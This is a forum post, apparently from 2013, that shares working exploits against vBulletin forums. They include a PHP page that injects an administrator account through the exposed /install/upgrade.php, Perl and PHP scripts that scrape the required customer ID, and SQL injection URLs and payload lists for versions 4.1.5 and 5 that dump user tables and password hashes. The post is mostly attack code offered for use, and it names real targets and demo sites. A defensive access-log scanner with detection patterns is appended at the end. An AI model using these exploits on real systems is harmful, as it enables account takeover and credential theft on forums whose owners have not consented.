Thread status:
Closed
  1. كونكورد

    كونكورد Developer

    Joined:
    25 January 2013
    Messages:
    16
    Likes received:
    0
    Trophy points:
    1
    Peace be upon you, and God's mercy and blessings.

    Hacks of forums by a group on Zone-H have been spreading

    noticeably, especially since some of the forums are important ones:

    DirectAdmin Forums
    Hostmonster Forums
    https://forums.suse.com/

    and others.

    The vulnerability was in the upgrade directory.
    How to exploit the vulnerability

    Step one:
    Check that the file /install/upgrade.php exists


    Step two:
    After opening /install/upgrade.php, right-click and view the page source

    Step three:

    Search for the value CUSTNUMBER and, if you find it, copy it


    Step four:
    Upload the exploit file to a server and browse to it
    PHP code:
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>vBulletin 0day</title>
    <style type="text/css">
    <!--
    body { background-color: #000; text-align: center; color: #063; font-size: large; }
    .a { font-size: 24px; }
    .f { color: #060; }
    .gbf { color: #F00; }
    .dd { color: #F00; }
    .w { font-size: large; }
    a:link { text-decoration: none; }
    a:visited { text-decoration: none; }
    a:hover { text-decoration: none; }
    a:active { text-decoration: none; }
    -->
    </style>
    </head>
    <body>
    <p class="a">
    <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
    <br>Created by: 1337<br>Found on: 08/22/2013<br>Website: http://www.madleets.com</p>
    <br>
    <?php
    // extract data from the post
    if (isset($_POST['submit'])) {
        extract($_POST);
        // set POST variables
        $url = $_POST['url'];
        $fields = array(
            'ajax' => urlencode('1'),
            'version' => urlencode('install'),
            'checktable' => urlencode('false'),
            'firstrun' => urlencode('false'),
            'step' => urlencode('7'),
            'startat' => urlencode('0'),
            'only' => urlencode('false'),
            'customerid' => urlencode($_POST['customerid']),
            'options[skiptemplatemerge]' => urlencode('0'),
            'response' => urlencode('yes'),
            'htmlsubmit' => urlencode('1'),
            'htmldata[username]' => urlencode($_POST['username']),
            'htmldata[password]' => urlencode($_POST['password']),
            'htmldata[confirmpassword]' => urlencode($_POST['password']),
            'htmldata[email]' => urlencode($_POST['email'])
        );
        // url-ify the data for the POST
        foreach ($fields as $key => $value) { $fields_string .= $key . '=' . $value . '&'; }
        rtrim($fields_string, '&');
        // open connection
        $ch = curl_init();
        // set the url, number of POST vars, POST data
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, count($fields));
        curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
        curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
        curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
        // execute post
        $result = curl_exec($ch);
        // close connection
        curl_close($ch);
        exit();
    }
    ?>
    <center>
    <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
    <span>Example:http://test.com/forum/install/upgrade.php</span><br>
    <span>Website:</span>
    <input name="url" type="text" tabindex="1" size="60" />
    <br>
    <span>Customer ID:</span>
    <input name="customerid" type="text" tabindex="2" size="40" />
    <br>
    <span>Username:</span>
    <input name="username" type="text" tabindex="3" size="40" />
    <br>
    <span>Password:</span>
    <input name="password" type="text" tabindex="4" size="40" />
    <br>
    <span>Email:</span>
    <input name="email" type="text" tabindex="5" maxlength="40" />
    <input name="submit" type="submit" value="Inject Admin">
    </form>
    </center>
    <p class="a">------------------------------------------------------------------------------------------------------------------</p>
    <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
    <p class="a">------------------------------------------------------------------------------------------------------------------</p>
    </div>
    </pre>
    <p class="a">&nbsp;</p>
    <p align="center">
    </body></html>


    And here is the exploit link, which I have uploaded for you:
    vBulletin 0day


    There is also a Perl exploit and another one in PHP

    and also
    vbulletin 4.1.5 attachment SQLI
    and also
    vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

    PHP code:
    vBulletin x.x.x Customer Area 0day
    -------------------------------------------------
    vBulletin x.x.x Customer Area 0day
    Perl script got leaked so decided to post the perl script here
    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Request::Common;

    system('cls');
    system('title vBulletin Install Auto Exploiter');
    print "\n ---------------------------------------";
    print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
    print " ---------------------------------------\n";
    print " + d4tabase.com -+- d4tabase.com + ";
    print "\n ---------------------------------------\n";
    print " coded by n0tch shoutz d4tabase crew ";
    print "\n ---------------------------------------\n";

    if($#ARGV == -1 or $#ARGV > 0){
        print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
        exit;
    }

    $domain = $ARGV[0];
    $install_dir = "install";
    $full_domain = "http://$domain/$install_dir/upgrade.php";
    chop($domain);

    &search;

    sub search{
        $url = $full_domain;
        $lwp = LWP::UserAgent->new();
        $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
        $request = $lwp->post($url, ["searchHash" => "Search"]);
        print " Searching $domain ----\n ";
        if ($request->content =~ /CUSTNUMBER = \"(.+)\";/){
            print "Result : $1\n";
        } else {
            print "Hash: Hash not found!\n";
        }
    }

    php exploit
    ---------------------
    <?php
    set_time_limit(0);

    if($argc < 2) {
        echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
        exit;
    }

    $URL = $argv[1];
    $arr = parse_url($URL);

    ### work with url
    if(strpos($URL, '?')) die("Ohh, your URL is not valid");
    if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
    if(!$arr['scheme']) $URL = 'http://' . $URL;

    $headers = get_headers($URL . '/install/upgrade.php');
    if(substr($headers[0], 9, 3) == '200') {
        $source = file_get_contents($URL . "/install/upgrade.php");
    }
    elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
        if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
    }
    else die("something went wrong...");

    preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
    foreach ($res[1] as $hash) {
        echo "Hash: " . $hash . PHP_EOL;
        $fp = fopen("hash.txt", "a+");
        fwrite($fp, $hash . PHP_EOL);
    }
    ?>
    ------------------------------------------------------------------------
    vbulletin 4.1.5 attachment SQLI

    vbulletin 4.1.5 attachment SQLI
    While examining variables I came across an SQL injection which, as later found, is inherent to all vBulletin 4.1.5.
    Title: Vulnerability in vBulletin 4.1.5
    Dork: Powered by vBulletin 4.1.5
    Conditions: An account on the forum. Permission to attach files to messages / themes (attachments).
    Register -> go to the forum -> click a topic, or if the board is, you can choose to create an article (the second option works more) -> at the bottom look for Attachments 'Manage Attachments' -> open the window and into the setting "values[f]" insert our SQL query.
    Example:
    Code:
    http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
    After that we see the standard "database offline" error; opening the source code of the page we see:
    Code:
    <!--
    Database error in vBulletin 4.1.5:
    Invalid SQL:
    SELECT permissionsfrom, hidden, setpublish, publishdate, userid
    FROM ds23fSDdfsdf_cms_node
    WHERE nodeid = -1599 or (1,2) = (select * from (select name_const(version(),1), name_const(version(),1)) a);
    MySQL Error   : Duplicate column name '5.1.49-3'
    Error Number  : 1060
    Request Date  : Tuesday, February 12th 2013 @ 01:12:33 PM
    Error Date    : Tuesday, February 12th 2013 @ 01:12:33
    Address       : 127.0.0.1
    Username      : Hacker
    Classname     : vB_Database
    MySQL Version :
    -->
    ----------------------------------------------
    vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
    [ASCII-art banner]
    **********************************************************************
    #Title: vBulletin 5 SQL Injection > Beta Whatever
    #Author: 0x0A
    #Date: Dec 11, 2012
    #Category: web application
    #Type: SQL Injection
    #Requirements: Firefox/Live HTTP Headers/
    #Software Link: http://www.vbulletin.com/purchases/ http://www.vbulletin.com/features/
    #Homepage: hackyard.net***********.com
    #Version: 5 and above(not older versions)
    #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
    #Demo sites to try: http://www.sultantheme.com/vb5connectforum/ http://vb5connect.com/bb/
    **********************************************************************

    How to
    -------------------------------------------------------------------
    [#1] First of all, make an account on the vBulletin 5 forum, http://img402.imageshack.us/img402/7784/69376730.png
    -------------------------------------------------------------------
    [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/) http://imageshack.us/a/img12/305/89268702.png
    -------------------------------------------------------------------
    [#3] After that click the Like button; you will receive almost the same result as me. Go to the first POST record as in the picture below and click the Replay button, http://imageshack.us/a/img707/9990/68621087.png
    -------------------------------------------------------------------
    [#4] Then, on Send POST Content use this:
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27,0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    http://imageshack.us/a/img42/1590/26447606.png
    // Note: keep the nodeid value as it was by default in the POST Content; otherwise you'll get an invalid nodeid error. The SQLi command above will fetch out the first record from the user table (username/password).
    -------------------------------------------------------------------

    [#Other SQLi Syntaxes]

    Version():
    nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    User():
    nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    Database():
    nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    Database Print:
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    Table Count:
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    Print Tables:
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    Columns of selected table:
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

    Fetch Out Data:
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    -------------------------------------------------------------------
    [ASCII-art Christmas tree: "Merry Xmas"]
    ----------------------------------------------------
    ==[ That's it!
    ==[ Thanks, 0x0A!
    ==[ Romania
    ----------------------------------------------------


    Step five:

    Put the CUSTNUMBER value in the Customer ID field,

    and in the other fields the admin name, password and email; a user with admin privileges will then be added.
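Seen from the defending side, everything the post above describes leaves a trace in the web server's access log: a live forum has no reason to receive any request for /install/upgrade.php (the install directory is only needed during setup), a POST to it is the admin-injection step itself, and the attachment and vBulletin 5 payloads carry the error-based `floor(rand(0)*2)` / `name_const(` constructs. The script below is an added example written for this page, not code from the post or from vBulletin; it assumes Apache/nginx "combined" log format and that matching any .php under an `/install/` directory (a generalization of the single path in the post) is acceptable. The log lines are constructed for the example.

```python
"""Flag the attack patterns described in the post in web-server access log lines."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the error-based injection technique used by the payloads above
# (duplicate-key trick via floor(rand(0)*2) ... group by, or name_const()).
# information_schema is included as a weaker indicator; tune for your own admin pages.
SQLI_RE = re.compile(
    r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|name_const\s*\(|information_schema",
    re.IGNORECASE,
)


def is_install_script(path):
    # Assumption: any PHP script under an /install/ directory is off-limits on a live forum,
    # which covers /install/upgrade.php from the post and its siblings.
    return "/install/" in path and path.endswith(".php")


def classify(line):
    """Return a finding dict for a suspicious line, or None for normal traffic / unparseable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    query = unquote_plus(parts.query)  # payloads arrive URL-encoded; decode before matching
    findings = []
    if is_install_script(path):
        # A GET is the reconnaissance step (viewing source for CUSTNUMBER);
        # a POST is the admin-creation request itself.
        severity = "high" if m.group("method") == "POST" else "medium"
        findings.append((severity, "install-script-access"))
    if SQLI_RE.search(query):
        findings.append(("high", "error-based-sqli-pattern"))
    if not findings:
        return None
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        "status": m.group("status"),
        "findings": findings,
    }


def scan(lines):
    """Classify every line and keep only the suspicious ones, in log order."""
    return [r for r in (classify(line) for line in lines) if r]


# Constructed sample log: one benign request, the two upgrade.php steps,
# the attachment SQLi URL from the post, and a stray floor(rand(0)*2) probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Aug/2013:10:01:02 +0000] "GET /forum/showthread.php?t=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [22/Aug/2013:10:01:30 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 200 2210',
    '203.0.113.5 - - [22/Aug/2013:10:02:11 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 200 318',
    '198.51.100.7 - - [12/Feb/2013:13:12:33 +0000] "GET /board/newattachment.php?do=assetmanager'
    '&values%5Bf%5D=-1599+or(1,2)%3D(select*from(select+name_const(version(),1),name_const(version(),1))a) HTTP/1.1" 500 1044',
    '198.51.100.7 - - [12/Feb/2013:13:15:00 +0000] "GET /board/search.php?q=floor%28rand%280%29*2%29 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        tags = ", ".join(f"{sev}:{name}" for sev, name in hit["findings"])
        print(f'{hit["ip"]} {hit["method"]} {hit["path"]} -> {hit["status"]} [{tags}]')
```

Run it over a real log with `scan(open("access.log").readlines())`; a single GET of an install script is worth a ticket on its own, while a POST or any SQLi hit from the same address should be treated as an active compromise attempt and the install directory removed or blocked outright.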
     